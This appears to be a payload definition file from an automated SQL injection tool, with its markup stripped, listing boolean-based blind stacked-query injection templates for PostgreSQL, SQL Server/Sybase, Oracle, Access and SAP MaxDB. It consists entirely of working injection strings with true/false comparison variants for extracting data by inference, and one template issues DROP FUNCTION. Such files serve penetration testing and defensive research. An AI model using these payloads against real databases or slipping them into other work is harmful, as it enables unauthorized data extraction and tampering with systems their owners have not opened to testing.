;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1
--
;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1
PostgreSQL
Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
1
3
1
1-8
1
;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
--
;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
Microsoft SQL Server
Sybase
Microsoft SQL Server/Sybase boolean-based blind - Stacked queries
1
4
1
1-8
1
;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)
--
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)
Microsoft SQL Server
Sybase
Oracle boolean-based blind - Stacked queries
1
4
1
1-8
1
;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL
--
;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL
Oracle
Microsoft Access boolean-based blind - Stacked queries
1
5
1
1-8
1
;IIF([INFERENCE],1,1/0)
;IIF([RANDNUM]=[RANDNUM],1,1/0)
%16
;IIF([RANDNUM]=[RANDNUM1],1,1/0)
Microsoft Access
SAP MaxDB boolean-based blind - Stacked queries
1
5
1
1-8
1
;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END
;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END
--
;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END
SAP MaxDB